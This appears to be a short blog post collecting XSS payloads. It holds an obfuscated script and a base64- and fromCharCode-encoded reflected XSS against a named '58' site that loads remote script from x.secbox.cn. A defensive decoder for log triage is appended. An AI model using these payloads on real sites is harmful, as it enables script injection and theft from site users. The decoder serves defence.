XSS Collection

Today I saw this posted by Wing on WeChat Moments:

File Transfer Assistant
<html>
<head>
<meta charset="utf-8">
</head>
<script>
([,하,,,,훌]=[]+{},[한,글,페,이,,로,드,ㅋ,,,ㅎ]=[!!하]+!하+하.ㅁ)
[훌+=하+ㅎ+ㅋ+한+글+페+훌+한+하+글][훌](로+드+이+글+한+'(45)')()
</script>
</html>

A reflected XSS on a 58 site

e1h9amF2YXNjcmlwdDpldmFsKFN0cmluZy5mcm9tQ2hhckNvZGUoMTAwLDExMSw5OSwxMTcsMTA5LDEwMSwxMTAsMTE2LDQ2LDExOSwxMTQsMTA1LDExNiwxMDEsNDAsMzksNjAsMTE1LDk5LDExNCwzOSw0MywzOSwxMDUsMTEyLDExNiw0NywxMTUsMTE0LDk5LDYxLDM0LDQ3LDQ3LDEyMCw0NiwxMTUsMTAxLDk5LDk4LDExMSwxMjAsNDYsOTksMTEwLDQ3LDEwOSw3OCw3Nyw4NCw5MCwxMDcsMzQsNjIsNjAsNDcsMTE1LDk5LDExNCwzOSw0MywzOSwxMDUsMTEyLDExNiw2MiwzOSw0MSw1OSwpKXtYfXhnb3tYfTA=&type=nk
  • First, convert document.write('<scr'+'ipt/src="//x.secbox.cn/mNMTZk"></scr'+'ipt>'); with FromCharCode into the following:
{X}javascript:eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,115,99,114,39,43,39,105,112,116,47,115,114,99,61,34,47,47,120,46,115,101,99,98,111,120,46,99,110,47,109,78,77,84,90,107,34,62,60,47,115,99,114,39,43,39,105,112,116,62,39,41,59,)){X}xgo{X}0
  • Then base64-encode it to get the string at the top.
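
For log triage, the two encoding steps above can be reversed to see what a suspicious parameter value actually carries. The following is an added example, not part of the original post; the function names are hypothetical and the sample input is constructed (same wrapper shape, harmless alert(45) inside).

```javascript
'use strict';
// Added example (not from the original post): reverse the two encoding
// layers described above so a logged parameter value can be inspected.

// Decode every String.fromCharCode(n, n, ...) call found in `text`.
// Empty items are skipped, so a trailing comma such as "59,)" is tolerated.
function decodeCharCodeCalls(text) {
  const out = [];
  for (const m of text.matchAll(/String\.fromCharCode\(([\d\s,]*)\)/gi)) {
    const codes = m[1].split(',').map(s => s.trim()).filter(Boolean).map(Number);
    out.push(String.fromCharCode(...codes));
  }
  return out;
}

// Return the decoded text if `value` is well-formed base64 that yields
// printable ASCII, otherwise null (ordinary values such as "nk" are not touched).
function tryBase64(value) {
  const v = value.trim();
  if (v.length < 8 || v.length % 4 !== 0 || !/^[A-Za-z0-9+/]+={0,2}$/.test(v)) return null;
  const decoded = Buffer.from(v, 'base64').toString('utf8');
  return /^[\x20-\x7e\s]+$/.test(decoded) ? decoded : null;
}

// Markers worth flagging once the layers are peeled.
const SUSPICIOUS = /javascript:|eval\s*\(|document\.write|<\s*script|fromCharCode/i;

// Peel base64, then fromCharCode, and report every layer that was recovered.
function inspectParam(value) {
  const layers = [value];
  const b64 = tryBase64(value);
  if (b64 !== null) layers.push(b64);
  layers.push(...decodeCharCodeCalls(layers[layers.length - 1]));
  return { layers, flagged: layers.some(l => SUSPICIOUS.test(l)) };
}

// Constructed sample: same wrapper shape as the post, harmless inner script.
const INNER = 'alert(45)';
const CODES = Array.from(INNER, c => c.charCodeAt(0)).join(',');
const SAMPLE_PARAM = Buffer.from(
  `{X}javascript:eval(String.fromCharCode(${CODES},)){X}xgo{X}0`
).toString('base64');

const report = inspectParam(SAMPLE_PARAM);
console.log(report.flagged, report.layers);
```

The raw base64 value matches none of the markers; it is flagged only after decoding, which is why filters that inspect just the value as received miss this kind of input.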